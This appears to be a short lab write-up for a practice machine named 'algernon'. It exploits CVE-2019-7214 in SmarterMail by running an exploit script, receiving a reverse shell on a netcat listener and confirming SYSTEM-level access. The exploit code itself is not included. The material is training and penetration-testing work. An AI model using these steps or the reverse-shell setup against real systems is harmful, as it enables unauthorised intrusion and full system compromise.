CVE-2019-7214
The target system has SmarterMail up and running and it has been suspected to be vulnerable to CVE-2019-7214
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/algernon]
└─$ python3 CVE-2019-7214.py
Executing the exploit script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/algernon]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.236.65] 50111
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
algernon
PS C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.236.65
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.236.254
Initial Foothold established to the target system as SYSTEM
via exploiting CVE-2019-7214
System level compromise